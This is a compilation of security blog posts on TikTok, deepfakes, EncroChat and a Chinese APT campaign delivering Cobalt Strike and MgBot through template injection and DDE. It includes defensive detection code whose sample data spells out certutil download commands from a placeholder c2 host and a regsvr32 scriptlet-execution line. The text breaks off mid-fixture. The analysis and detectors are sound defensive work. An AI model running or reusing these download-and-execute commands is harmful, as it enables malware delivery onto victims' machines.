IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

TikTok is being discouraged and the app may be banned

In recent news, retail giant Amazon sent a memo to employees telling them to delete the popular social media app TikTok from their phones. The memo stated that the app posed a security risk, without going into details. Later the memo was withdrawn without explanation other than that it had been sent in error. Are we curious yet, my dear Watson?

What is TikTok

For those of us who can’t tell one social media app from another: TikTok is one of the most popular, designed specifically to let users upload short videos for others to like and share. Functionality has grown from a basic lip-sync app to hosting a wide variety of short video clips. It is predominantly popular among a younger audience; most users are between 13 and 24 years old. In the first quarter of 2019, TikTok was the most downloaded app in the App Store, with over 33 million installs. TikTok is owned by a Chinese tech company called ByteDance.

Nation states’ attention

This wasn’t the first time TikTok faced removal from a number of devices. India has already banned TikTok, and the USA and Australia are also considering blocking the app. In fact, in December the US Army banned TikTok from its phones, and in March US senators proposed a bill that would block TikTok from all government devices.

Is TikTok safe?

For starters, TikTok being a Chinese product does not help. A number of Chinese apps and software packages have been under investigation and were found to be “calling home”. Now, this does not automatically mean they are spying on you, but when you start an investigation with a negative expectation, you are inclined to see it as such. And gathering information about a user without their consent is wrong.

The fact that TikTok is different in China itself, where it goes under the name Douyin, is another factor. But this could be explained away as well, as China has a reputation for spying on its population. So maybe the foreign version is less intrusive than the domestic one. And some governments have their own reasons not to trust anything of Chinese origin, or another agenda to boycott products originating from China.

Adding to the suspicion, a Reddit user by the handle of bangorlol posted comments about the data found to be sent home when he reverse-engineered the app. The same user has started a thread on Reddit where he invites other reverse-engineers to cooperate on newer versions of the app. One type of behavior that was confirmed by another source is that the app copies information from the clipboard, which certainly goes above and beyond what other social media apps do.

TikTok’s defense

TikTok’s main defense consists of the fact that most of their senior staff are outside of China. On their blog they also specified where their data are stored and that the data are not subject to Chinese law.

“TikTok is led by an American CEO, with hundreds of employees and key leaders across safety, security, product, and public policy here in the US. We have never provided user data to the Chinese government, nor would we do so if asked.”

Options to ban TikTok completely

Besides organizations like Wells Fargo and some branches of the US military asking their employees to refrain from using the app on devices that also hold organizational data, we have also seen countries advocating a total ban of the app. But this is not an easy goal to achieve and could also prove ineffective.

For a total ban of an app you would have to get it removed from the official app stores. This is harder for some countries than for others. India banned TikTok along with 58 other Chinese apps. The US government would have to find a legally sound reason to request that Apple and Google pull TikTok from their app stores, and would probably meet a lot of resistance.

Besides, if people want to install a popular app like TikTok there are many other sources. Downloads are not limited to the official app stores, so a determined user will be able to find the app elsewhere. And it does not stop the millions of active users from continuing to use the app.

Another option is to give TikTok the same treatment as Huawei: put it on the Commerce Department’s Entity List, which would deny it access to US technology. Given the circumstances, that doesn’t accomplish much more than denying it access to the app stores, with the same consequences as discussed above.

Social media and privacy

We have warned many times against posting privacy-sensitive information on social media, and have offered guidance for you and your children on using social media safely. We even posted a guide for those who wanted to remove themselves from the major social media platforms.

But when the social media app itself is determined to mine your data it becomes a whole different story. We have seen no conclusive proof that this is true for TikTok, but some of the allegations are very serious and seem to be supported by facts and authoritative research.

Anonymous warns about TikTok

Other analysts dismissed the researchers’ findings as jumping to conclusions. One thing is for sure: a full analysis without the help of the developers will take a lot of effort and time, and even then the results may still be disputable. At this point we cannot be sure whether the TikTok app is spying on its users in a way that goes deeper than we might expect from an ordinary social media app.

All we can do at this point is to inform our users about the ongoing discussion and maybe explain some of the points that are being brought up. We also feel the need to repeat our warnings about the difficult relationship between social media and privacy. Obviously if any concrete facts should surface we will keep you posted.

Stay safe everyone!

The post TikTok is being discouraged and the app may be banned appeared first on Malwarebytes Labs.

A week in security (July 20 – 26)

Last week on Malwarebytes Labs, our Lock and Code podcast delved into Bluetooth and beacon technology. We also dug into APT groups targeting India and Hong Kong, covered a law enforcement bust, and tried to figure out when, exactly, a Deepfake is a Deepfake.

Other cybersecurity news

Stay safe!

The post A week in security (July 20 – 26) appeared first on Malwarebytes Labs.

Deepfakes or not: new GAN image stirs up questions about digital fakery

Subversive deepfakes that enter the party unannounced, do their thing, then slink off into the night without anybody noticing are where it’s at. Easily debunked clips of Donald Trump yelling THE NUKES ARE UP or something similarly ludicrous are not a major concern. We’ve already dug into why that’s the case.

What we’ve also explored are the people-centric ways you can train your eye to spot stand-out flaws and errors in deepfake imagery—essentially, GANs (generative adversarial networks) gone wrong. There will usually be something a little off in the details, and it’s up to us to discover it.

Progress is being made in the realm of digital checking for fraud, too, with some nifty techniques available to see what’s real and what isn’t. As it happens, a story is in the news which combines subversion, the human eye, and even a splash of automated examination for good measure.

A deepfake letter to the editor

A young chap, “Oliver Taylor”, studying at the University of Birmingham found himself with editorials published in major news sources such as the Times of Israel and the Jerusalem Post, his writing “career” apparently kicking into life in late 2019, with additional articles in various places throughout 2020.

After a stream of these pieces, everything exploded in April when a new article from “Taylor” landed making some fairly heavy accusations against a pair of UK-based academics.

After the inevitable fallout, it turned out that Oliver Taylor was not studying at the University of Birmingham. In fact, he was apparently not real at all and almost all online traces of the author vanished into the ether. His mobile number was unreachable, and nothing came back from his listed email address.

Even more curiously, his photograph bore all the hallmarks of a deepfake (or, controversially, not a “deepfake” at all; more on the growing clash over descriptive names later). Regardless of what you intend to class this man’s fictitious visage as, in plain terms, it is an AI-generated image designed to look as real as possible.

Had someone created a virtual construct and bided their time with a raft of otherwise unremarkable blog posts simply to get a foothold on major platforms before dropping what seems to be a grudge post?

Fake it to make it

Make no mistake, fake entities pushing influential opinions is most definitely a thing. Right-leaning news orgs have recently stumbled into just such an issue. Not so long ago, an astonishing 700 pages with 55 million followers were taken down by Facebook in a colossal AI-driven disinformation blowout dubbed “Fake Face Swarm.” This large slice of Borg-style activity made full use of deepfakes and other tactics to consistently push political messaging with a strong anti-China lean.

Which leads us back to our lone student, with his collection of under-the-radar articles, culminating in a direct attack on confused academics. The end point—the 700 pages worth of political shenanigans and a blizzard of fake people—could easily be set in motion by one plucky fake human with a dream and a mission to cause aggravation for others.

How did people determine he wasn’t real?

Tech steps up to the plate

A few suspicions, and the right people with the right technology in hand, is how they did it. There’s a lot you can do to weed out bogus images, and there’s a great section over on Reuters that walks you through the various stages of detection. No longer do users have to manually pick out the flaws; technology will (for example) isolate the head from the background, making it easier to see frequently distorted flaws. Or perhaps we can make use of heatmaps generated by algorithms to highlight areas most suspected of digital interference.

Even better, there are tools readily available which will give you the under-the-hood summary of what’s happening with one image.

Digging in the dirt

If you edit a lot of photographs on your PC, you’re likely familiar with EXIF metadata. This is a mashing together of lots of bits of information at the moment the photo is taken. Camera/phone type, lens, GPS, colour details—the sky’s the limit. On the flipside, some of it, like location data, can potentially be a privacy threat so it’s good to know how to remove it if needs be.

As with most things, it really depends what you want from it. AI-generated images are often no different.

There are many ways to stitch together your GAN imagery. This leaves traces, unless you try to obfuscate it or otherwise strip some information out. There are ways to dig into the underbelly of a GAN image, and bring back useful results.

Image swiping: often an afterthought

Back in November 2019, I thought it would be amusing if the creators of “Katie Jones” had just lazily swiped an image from a face generation website, as opposed to agonising over the fake image details.

For our fictitious university student, it seems that the people behind it may well have done just that [1], [2]. The creator of the site the image was likely pulled from has said they’re looking to make their images no longer downloadable, and/or place people’s heads in front of a 100 percent identifiably fake background such as “space.” They also state that “true bad actors will reach for more sophisticated solutions,” but as we’ve now seen in two high-profile cases, bad actors with big platforms and influential reach are indeed just grabbing whatever fake image they desire.

This is probably because ultimately the image is just an afterthought; the cherry on an otherwise bulging propaganda cake.

Just roll with it

As we’ve seen, the image wasn’t tailor-made for this campaign. It almost certainly wasn’t at the forefront of the plan for whoever came up with it, and they weren’t mapping out their scheme for world domination starting with fake profile pics. It’s just there, and they needed one, and (it seems) they did indeed just grab one from a freely-available face generation website. It could just as easily have been a stolen stock model image, but that is of course somewhat easier to trace. 

And that, my friends, is how we end up with yet another subtle use of synthetic technology whose presence may ultimately have not even mattered that much.

Are these even deepfakes?

An interesting question, and one that seems to pop up whenever a GAN-generated face is attached to dubious antics or an outright scam. Some would argue a static, totally synthetic image isn’t a deepfake because it’s a totally different kind of output.

To break this down:

  1. The more familiar type of deepfake, where you end up with a video of [movie star] saying something baffling or doing something salacious, is produced by feeding a tool multiple images of that person. This nudges the AI into making the [movie star] say the baffling thing, or perform actions in a clip they otherwise wouldn’t exist in. The incredibly commonplace porn deepfakes would be the best example of this.
  2. The image used for “Oliver Taylor” is a headshot sourced from a GAN which is fed lots of images of real people, in order to mash everything together in a way that spits out a passable image of a 100 percent fake human. He is absolutely the sum of his parts, but in a way which no longer resembles them.

So, when people say, “That’s not a deepfake,” they’re wanting to keep a firm split between “fake image or clip based on one person, generated from that same person” versus “fake image or clip based on multiple people, to create one totally new person.”

The other common negative mark set against calling synthetic GAN imagery deepfakes, is that the digital manipulations are not what make it effective. How can it be a deepfake if it wasn’t very good?

Call the witnesses to the stand

All valid points, but the counterpoints are also convincing.

If we’re going to dismiss their right to deepfake status because digital manipulations are not effective, then we’re going to end up with very few bona-fide deepfakes. The digital manipulations didn’t make it effective, because it wasn’t very good. By the same token, we’d never know if digital manipulations haven’t made a good one because we’d miss it entirely as it flies under the radar.

Even the best movie-based variants tend to contain some level of not-quite-rightness, and I have yet to place a bunch before me where I couldn’t spot at least nine out of 10 GAN fakes mixed in with real photos.

As interesting and as cool as the technology is, the output is still largely a bit of a mess. From experience, the combo of a trained eye and some of the detection tools out there make short work of the faker’s ambitions. The idea is to do just enough to push whatever fictional persona/intent attached to the image is over the line and make it all plausible—be it blogs, news articles, opinion pieces, bogus job posting, whatever. The digital fakery works best as an extra chugging away in the background. You don’t really want to draw attention to it as part of a larger operation.

Is this umbrella term a help or a hindrance?

As for keeping the tag “deepfake” away from fake GAN people, while I appreciate the difference in image output, I’m not 100 percent sure that this is necessarily helpful. The word deepfake is a portmanteau of “deep learning” and “fake.” Whether you end up with Nicolas Cage walking around in The Matrix, or you have a pretend face sourced from an image generation website, they’re both still fakes borne of some form of deep learning.

The eventual output is the same: a fake thing doing a fake thing, even if the path taken to get there is different. Some would argue this is a potentially needless and unnecessary split/removal of a catch-all definition which manages to helpfully and accurately apply to both above—and no doubt other—scenarios.

It would be interesting to know if there’s a consensus in the AI deep learning/GAN creation/analyst space on this. From my own experience talking to people in this area, the bag of opinions is as mixed as the quality from GAN outputs. Perhaps that’ll change in the future.

The future of fakery detection

I asked Munira Mustaffa, Security Analyst, if automated detection techniques would eventually surpass the naked eye forever:

I’ve been mulling over this question, and I’m not sure what else I could add. Yes, I think automated deepfake checking can probably make a better assessment than the human eye eventually. However, even if you have the perfect AI to detect them, human review will always be needed. I think context also matters in terms of your question. If we’re detecting deepfakes, what are we detecting against?

I think it’s also important to recognise that there is no settled definition for what is a deepfake. Some would argue that the term only applies to audio/videos, while photo manipulations are “cheapfakes”. Language is critical. Semantics aside, at most, people are playing around with deepfakes/cheapfakes to produce silly things via FaceApp. But the issue here is really not so much about deepfakes/cheapfakes, but it is the intent behind the use. Past uses have indicated how deepfakes have been employed to sway perception, like that Nancy Pelosi ‘dumbfake’ video.

At the end of the day, it doesn’t matter how sophisticated the detection software is if people are not going to be vigilant with vetting who they allow into their network or who is influencing their point of view. I think people are too focused on the concept that deepfakes’ applications are mainly for revenge porn and swaying voters. We have yet to see large scale ops employing them. However, as the recent Oliver Taylor case demonstrated to us, deepfake/cheapfake applications go beyond that.

There is a real potential danger that a good deepfake/cheapfake that is properly backstopped can be transformed into a believable and persuasive individual. This, of course, raises further worrying questions: what can we do to mitigate this without stifling voices that are already struggling to find a platform?

We’re deepfakes on the moon

We’re at a point where it could be argued deepfake videos are more interesting conceptually than in execution. MIT’s Centre for Advanced Virtuality has put together a rendition of the speech Richard Nixon was supposed to give if the moon landing ended in tragedy. It is absolutely a chilling thing to watch; however, the actual clip itself is not the best technically.

The head does not play well with the light sources around it, the neckline of the shirt is all wrong against the jaw, and the voice has multiple digital oddities throughout. It also doesn’t help that they use his resignation speech for the body, as one has to wonder about the optics of shuffling papers as you announce astronauts have died horribly.

No, the interesting thing for me is deciding to show the deceptive nature of deepfakes by using a man who was born in 1913 and died 26 years ago. Does anyone under the age of 40 remember his look, the sound of his voice outside of parody and movies well enough to make a comparison? Or is the disassociation from a large chunk of collective memory the point? Does that make it more effective, or less?

I’m not sure, but it definitely adds weight to the idea that for now, deepfakes—whether video or static image—are more effective as small aspects of bigger disinformation campaigns than attention drawing pieces of digital trickery.

See you again in three months?

It’s inevitable we’ll have another tale before us soon enough, explaining how another ghostly entity has primed a fake ID long enough to drop their payload, or sow some discord at the highest levels. Remember that the fake imagery is merely one small stepping stone to an overall objective and not the end goal in and of itself. It’s a brave new world of disruption, and perhaps by the time you’re pulling up another chair, I might even be able to give you a definitive naming convention.

The post Deepfakes or not: new GAN image stirs up questions about digital fakery appeared first on Malwarebytes Labs.

EncroChat system eavesdropped on by law enforcement

Due to the level of sophistication of the attack, and the malware code, we can no longer guarantee the security of your device.

This text caused a lot of aggravation, worries, and sleepless nights. No one wants to hear the security of their device has been compromised by a malware attack. The good news is that the actual victims of this malware attack were almost exclusively criminals. The bad news is that the message was sent out by a provider called EncroChat, which had previously billed itself as being as private as an in-person conversation in a soundproof room.

EncroChat provided customers with secure messaging and cryptophones. The messaging was built on OTR (Off-the-Record Messaging), a cryptographic protocol that provides end-to-end encryption and authentication for instant messaging, with forward secrecy: session keys come from a fresh Diffie-Hellman exchange between the two parties, so a later compromise of a long-term key, whether a user’s or anything held on the server, does not expose earlier session keys. Even when a server is seized, there is nothing on it that decrypts past conversations or cryptographically ties them to the participants.

What happened to EncroChat?

EncroChat, a company based in the Netherlands, advertises their services as safer than safe, stating that no messages are saved on their servers, which are located “offshore.” But at some point, Dutch law enforcement figured out the EncroChat servers were located in France and got to work, hoping to catch criminals in the act.

Decryption specialists that had been involved in the Ennetcom (Canada) and PGP Safe (Costa Rica) cases were consulted and managed to access the EncroChat systems—their method of access is still unknown to the public. When asked how they managed to follow conversations on EncroChat, Netherlands’ Team High Tech Crime chose not to answer. They may have hopes to use the method again in the future with another service.

Based on the information disclosed by EncroChat, it is likely that law enforcement agencies managed to install software on the servers that provided the phones with updates or delivered malware to the phones in another form. Either way, infecting devices allowed them to see the unencrypted messages. In essence, with enough infected devices, law enforcement was able to follow conversations in real time.

The warning that EncroChat sent out said:

They repurposed our domains to launch an attack to compromise carbon units. With control of our domain they managed to launch a malware campaign against the carbon to weaken its security.

Another clue supporting this takeaway was the fact that some users complained that the wipe function no longer worked, an indication that the malware was active at the device level.

What happened to EncroChat users?

Hundreds of arrests have already been made in the UK, the Netherlands, France, the Middle East, and a few other countries. On top of that, law enforcement has millions of chat messages that can lead to more arrests or serve as evidence in upcoming lawsuits. International drug traffickers have been hit especially hard by the service going bust.

But law enforcement’s move to access encrypted conversations sets a dangerous precedent. Likely, the police had to act immediately on information that was potentially life-threatening. However, without knowledge of how or why they breached the EncroChat system, their actions made encrypted chat users and operators suspicious about a possible leak. A criminal in the UK was confronted with an EncroChat message dating back to the end of 2019, so law enforcement agencies must have been monitoring the service for many months before users found out the system was compromised.

Why were so many criminals using EncroChat?

The EncroChat system was well organized and had gained a lot of trusting users over the years. Criminals felt secure enough to chat freely about everything: names of customers, drug deliveries, and even assassinations. And their trust was understandable, given what EncroChat had to offer:

  • Phones were dual boot, so users could alternatively start the Android operating system and their phones would look like a normal, old-fashioned model.
  • The phones had a “wipe all” button that would delete all the stored conversations in case of an arrest or other emergency.
  • No messages were stored on servers so they could not be seized and decrypted later.
  • OTR, unlike PGP, offers forward secrecy: past conversations cannot be reconstructed even if both parties’ long-term keys are later obtained, because each session’s keys derive from ephemeral values that are discarded.
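
To make the last point concrete, here is an added toy model (example code written for this page, not EncroChat’s or libotr’s implementation) of why a seized long-term private key decrypts a PGP-style message archive but yields nothing against OTR-style traffic. The group size, the HMAC-based stream cipher, the MAC standing in for OTR’s signed key exchange and the sample messages are all constructed for illustration and provide no real security.

```python
"""
Why a seized long-term key reads a PGP-style archive but not OTR-style traffic.
Toy primitives (DH over a Mersenne prime, HMAC-SHA256 as a stream cipher) keep
the key-handling logic visible; this is not EncroChat's or libotr's code.
"""
import hashlib
import hmac
import secrets

P = 2**127 - 1   # toy-sized group; real OTR uses the 1536-bit MODP group (RFC 3526)
G = 5


def keypair() -> tuple[int, int]:
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)


def kdf(shared: int) -> bytes:
    return hashlib.sha256(shared.to_bytes(16, "big")).digest()


def xor_stream(key: bytes, data: bytes) -> bytes:
    """HMAC-SHA256 in counter mode as a toy stream cipher; encrypt == decrypt."""
    stream, ctr = b"", 0
    while len(stream) < len(data):
        stream += hmac.new(key, ctr.to_bytes(4, "big"), hashlib.sha256).digest()
        ctr += 1
    return bytes(a ^ b for a, b in zip(data, stream))


# PGP-style: every message is encrypted to the recipient's long-lived key.
def pgp_encrypt(recipient_pub: int, msg: bytes) -> tuple[int, bytes]:
    eph_priv, eph_pub = keypair()
    ct = xor_stream(kdf(pow(recipient_pub, eph_priv, P)), msg)
    return eph_pub, ct        # this pair is what sits in a mailbox or on a seized phone


def pgp_decrypt(recipient_priv: int, eph_pub: int, ct: bytes) -> bytes:
    return xor_stream(kdf(pow(eph_pub, recipient_priv, P)), ct)


# OTR-style: long-term keys only authenticate; each session gets fresh DH values
# on both sides and the ephemeral private halves are thrown away afterwards.
def otr_session(alice_lt: tuple[int, int], bob_lt: tuple[int, int], msg: bytes):
    a_priv, a_pub = keypair()
    b_priv, b_pub = keypair()
    transcript = a_pub.to_bytes(16, "big") + b_pub.to_bytes(16, "big")
    # Toy stand-in for OTR's signed key exchange: each side MACs the ephemeral
    # values under a key only the two long-term key holders can derive.
    a_tag = hmac.new(kdf(pow(bob_lt[1], alice_lt[0], P)), transcript, hashlib.sha256).digest()
    b_tag = hmac.new(kdf(pow(alice_lt[1], bob_lt[0], P)), transcript, hashlib.sha256).digest()
    if not hmac.compare_digest(a_tag, b_tag):
        raise ValueError("authentication failed")
    session_key = kdf(pow(b_pub, a_priv, P))   # equals pow(a_pub, b_priv, P)
    ct = xor_stream(session_key, msg)
    del a_priv, b_priv, session_key           # forward secrecy lives here
    return a_pub, b_pub, a_tag, ct            # what an eavesdropper records


# An investigator who later seizes the long-term private keys:
def replay_pgp(archive, seized_priv: int) -> list[bytes]:
    return [pgp_decrypt(seized_priv, eph_pub, ct) for eph_pub, ct in archive]


def replay_otr(log, alice_lt_priv: int, bob_lt_pub: int) -> list[bytes]:
    # Both long-term keys together only yield the authentication key, which
    # never encrypted anything; the session keys depended on discarded values.
    wrong_key = kdf(pow(bob_lt_pub, alice_lt_priv, P))
    return [xor_stream(wrong_key, ct) for _, _, _, ct in log]


def demo(msgs=(b"meet at the usual place", b"wipe the phones if raided")):
    """Constructed sample messages; returns (plaintexts, PGP replay, OTR replay)."""
    msgs = list(msgs)
    bob_priv, bob_pub = keypair()
    pgp_archive = [pgp_encrypt(bob_pub, m) for m in msgs]
    alice_lt, bob_lt = keypair(), keypair()
    otr_log = [otr_session(alice_lt, bob_lt, m) for m in msgs]
    return msgs, replay_pgp(pgp_archive, bob_priv), replay_otr(otr_log, alice_lt[0], bob_lt[1])


if __name__ == "__main__":
    plain, from_pgp, from_otr = demo()
    print("PGP archive with seized key:", from_pgp)
    print("OTR log with seized keys:   ", from_otr)
```

Run it and the PGP archive comes back in the clear while the OTR log stays garbage. Note the limit of the property: whoever holds the long-term keys can still impersonate a party in future sessions (an active man-in-the-middle), and nothing here protects against malware reading messages on the handset before they are encrypted, which is the route the article describes.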

EncroChat users paid hefty fees for this service: thousands of dollars per year, per device. The exorbitant fees may explain why the majority of the EncroChat clientele could be found on the wrong side of the law. Other parties that might have a vested interest in keeping their chat messages secret include government parties, journalists, security professionals, or lawyers. However, there are cheaper, if somewhat less sophisticated, alternatives for legitimate secret-keeping that law enforcement does not target.

After law enforcement agencies had taken down or compromised other providers, many European criminals flocked to EncroChat. An estimate by the French police indicated that 90 percent of the EncroChat users were engaged in criminal activity. However, of the 60,000 EncroChat end users, only 800 were arrested.

Encryption and law enforcement

Dutch law enforcement’s ability to breach EncroChat supports our point that the police don’t need built-in backdoors to catch criminals. Governments have asked for both means of observing data in transit, as well as retrieving data at rest on devices of interest. Looking at this case, we doubt that criminals would have chatted so freely about their activities had they known there was a backdoor—or even the capability of a backdoor—somewhere in the system.

But providing law enforcement with free access into platforms of their choosing is a slippery slope. For one, hacking into a secure platform puts all users’ information in jeopardy. Despite the intel on criminal activity in EncroChat, there are still legitimate users whose private messages are now compromised. In addition, where should law enforcement draw the line? How many other encryption platforms will they compromise before users have nowhere to turn? And at what point will law enforcement make an assumption of guilt just because someone is using encrypted chat?

Time and again law enforcement agencies have demonstrated that even if they can’t keep up with every new security development, at some point they catch up and find a way around it. And when they do, the harvest is huge. In this case, police departments will have years of investigating ahead of them if they plan to follow up on the millions of messages they intercepted. They may also find that because of their means of access, many data points may be inadmissible in court.

Thankfully, breaking encryption is not easy, especially when the algorithm itself is sound, and flaws in algorithms with track records like PGP and OTR are a rare find. In practice an attacker has to find a flaw in the implementation, or intercept messages before they are encrypted on the sender’s device or after they are decrypted on the receiver’s, which is what malware on the handsets achieves.

Our hope is that law enforcement exhaust all other avenues of reconnaissance and investigation before moving to put the privacy of an entire platform of users in jeopardy. For now, legitimate users of end-to-end encryption programs needn’t worry about their company secrets or other confidential whisperings getting out. But for the potentially thousands of criminal EncroChat users that haven’t been arrested yet—time to worry.

The post EncroChat system eavesdropped on by law enforcement appeared first on Malwarebytes Labs.

Chinese APT group targets India and Hong Kong using new variant of MgBot malware

This blog post was authored by Hossein Jazi and Jérôme Segura

On July 2, we found an archive file with an embedded document pretending to be from the government of India. This file used template injection to drop a malicious template which loaded a variant of Cobalt Strike.

One day later, the same threat actor changed their template and dropped a loader called MgBot, executing and injecting its final payload through the use of Application Management (AppMgmt) Service on Windows.

On July 5, we observed yet another archive file with an embedded document borrowing a statement about Hong Kong from UK’s prime minister Boris Johnson. This document used the same TTPs to drop and execute the same payload.

Considering the ongoing tensions between India and China, as well as the new security laws over Hong Kong, we believe this new campaign is operated by a Chinese state-sponsored actor. Based on our analysis, we believe this may be a Chinese APT group that has been active since at least 2014.

Active targeting with different lures

We were able to track the activities related to these threat actors over the succession of several days based on unique phishing attempts designed to compromise their target.

‘Mail security check’ with Cobalt Strike (variant 1)

This campaign was most likely carried out through spear phishing emails. The .rar file (Mail security check.rar) includes a document with the same name (Figure 1).

Figure 1: Mail security check.docx

The document uses template injection to download a remote template from the following URL (Figure 2).

Figure 2: Template injection

The downloaded template uses the dynamic data exchange (DDE) protocol to execute malicious commands, which are encoded within the document’s content (Figure 3).
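
Both tricks leave footprints in the document’s XML, so a triage script can flag them before the file ever reaches Word. The following is an added example written for this page, not a tool from the Malwarebytes analysis: it opens a .docx as the zip container it is, reports an attachedTemplate relationship whose TargetMode is External (template injection) and reassembles field instructions to look for DDE or DDEAUTO (the instruction is normally split across several w:instrText runs, which defeats a naive string search). The in-memory sample document, hostnames and file names it checks are constructed placeholders.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS_W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
NS_REL = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)


def remote_templates(z: zipfile.ZipFile) -> list[str]:
    """Template injection: word/_rels/settings.xml.rels points the attached
    template at an external URL instead of a local .dotm."""
    name = "word/_rels/settings.xml.rels"
    if name not in z.namelist():
        return []
    root = ET.fromstring(z.read(name))
    return [rel.get("Target", "")
            for rel in root.iter(f"{{{NS_REL}}}Relationship")
            if rel.get("Type") == ATTACHED_TEMPLATE and rel.get("TargetMode") == "External"]


def dde_fields(z: zipfile.ZipFile) -> list[str]:
    """Field instructions that invoke DDE. Complex fields spread the instruction
    over several w:instrText runs, so join them per paragraph before matching;
    w:fldSimple carries the instruction in an attribute instead."""
    found = []
    for name in z.namelist():
        if not (name.startswith("word/") and name.endswith(".xml")):
            continue
        root = ET.fromstring(z.read(name))
        for para in root.iter(f"{{{NS_W}}}p"):
            texts = ["".join(t.text or "" for t in para.iter(f"{{{NS_W}}}instrText"))]
            texts += [f.get(f"{{{NS_W}}}instr", "") for f in para.iter(f"{{{NS_W}}}fldSimple")]
            found += [" ".join(t.split()) for t in texts if DDE_RE.search(t)]
    return found


def triage(docx_bytes: bytes) -> dict:
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return {"remote_templates": remote_templates(z), "dde_fields": dde_fields(z)}


def build_sample(malicious: bool = True) -> bytes:
    """Constructed in-memory .docx for the demo (not a real campaign sample):
    a remote attached template plus a DDEAUTO field split over two runs, the
    shape the article describes. Hostnames and file names are placeholders."""
    body = (
        '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve">DDEAUTO c:\\\\windows\\\\system32\\\\cmd.exe </w:instrText></w:r>'
        '<w:r><w:instrText xml:space="preserve">"/k certutil -urlcache -split -f '
        'http://c2.example.invalid/storm.sct ff.sct"</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
        if malicious else
        '<w:p><w:r><w:t>Quarterly mail security check</w:t></w:r></w:p>'
    )
    doc = (f'<?xml version="1.0" encoding="UTF-8"?>'
           f'<w:document xmlns:w="{NS_W}"><w:body>{body}</w:body></w:document>')
    rels = (f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{NS_REL}">'
            f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
            'Target="http://template.example.invalid/ADIN.docx" TargetMode="External"/>'
            '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", doc)
        if malicious:
            z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    print(triage(build_sample()))
    print(triage(build_sample(malicious=False)))
```

Run the same function over the downloaded template as well: in this campaign the lure document only carries the remote-template relationship, and the DDE field lives in the template it fetches.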

Figure 3: Encoded command

After decoding, we can see the list of commands that will be executed by DDE:

Figure 4: Decoded commands

As Figure 4 shows, the threat actors used certutil with the -urlcache -split -f parameters to download a COM scriptlet from their server and then used the Squiblydoo technique to execute the downloaded scriptlet via regsvr32.exe on the victim machine.

This scriptlet is stored in the Documents directory as “ff.sct”. The scriptlet is an XML file with embedded VBScript (Figure 5).

Figure 5: ff.sct snippet

The scriptlet creates a VBA macro and calls Excel to execute it. The macro has been obfuscated to bypass static detection and is responsible for injecting the embedded payload into rundll32.exe using reflective DLL injection. The injected payload is a variant of Cobalt Strike.

The following diagram shows the overall process of this attack:

Figure 6: Overall process

‘Mail security check’ with MgBot (variant 2)

As we mentioned earlier, a day after the first attack, the APT group changed its remote template. In this new variant, the actors stopped using the Squiblydoo technique and Cobalt Strike as a payload.

Figure 7 shows the new encoded commands embedded within the template file.

Figure 7: Encoded command

Figure 8 shows the list of commands that will be executed by DDE.

Figure 8: Decoded commands

In this new template file, the storm.sct scriptlet was replaced with storm.txt. Similar to the previous version, certutil is used to download the storm.txt file which is an executable stored in the Documents directory as ff.exe.
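
Seen from the endpoint, both variants produce the same chain: an Office process spawns cmd.exe, certutil pulls a file from the internet into Documents, and that file is then either handed to regsvr32 with scrobj.dll (variant 1) or executed directly (variant 2). The detector below is an added example for this page, not a Malwarebytes signature; it runs over constructed Sysmon-style process-creation events (the hostnames, PIDs and paths are invented) and correlates the certutil output path with what executes next, so the chain is reported as one finding rather than as unrelated alerts. It generalizes slightly beyond the article: it also catches the direct-URL form of Squiblydoo (regsvr32 /i:http://...) and ignores benign certutil -hashfile and regsvr32 use.

```python
import re
from collections import Counter

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "certutil.exe", "regsvr32.exe",
                       "mshta.exe", "rundll32.exe", "wscript.exe", "cscript.exe"}

# Constructed process-creation events in Sysmon Event ID 1 shape; not real telemetry.
EVENTS = [
    {"ts": 1, "pid": 4001, "ppid": 900, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\v\Downloads\Mail security check.docx"'},
    # the DDE field fires: Word launches cmd.exe with the decoded command chain
    {"ts": 2, "pid": 4002, "ppid": 4001, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'C:\Windows\System32\cmd.exe /c certutil -urlcache -split -f http://c2.example.invalid/storm.sct "C:\Users\v\Documents\ff.sct" & regsvr32 /s /u /i:"C:\Users\v\Documents\ff.sct" scrobj.dll'},
    {"ts": 3, "pid": 4003, "ppid": 4002, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r'certutil -urlcache -split -f http://c2.example.invalid/storm.sct "C:\Users\v\Documents\ff.sct"'},
    {"ts": 4, "pid": 4004, "ppid": 4002, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32 /s /u /i:"C:\Users\v\Documents\ff.sct" scrobj.dll'},
    # variant 2 shape: the download is an executable that is then run directly
    {"ts": 5, "pid": 4005, "ppid": 4002, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r'certutil -urlcache -split -f http://c2.example.invalid/storm.txt "C:\Users\v\Documents\ff.exe"'},
    {"ts": 6, "pid": 4006, "ppid": 4002, "image": r"C:\Users\v\Documents\ff.exe",
     "cmdline": r'"C:\Users\v\Documents\ff.exe"'},
    # benign look-alikes that must stay quiet
    {"ts": 7, "pid": 4007, "ppid": 900, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -hashfile C:\tools\setup.msi SHA256"},
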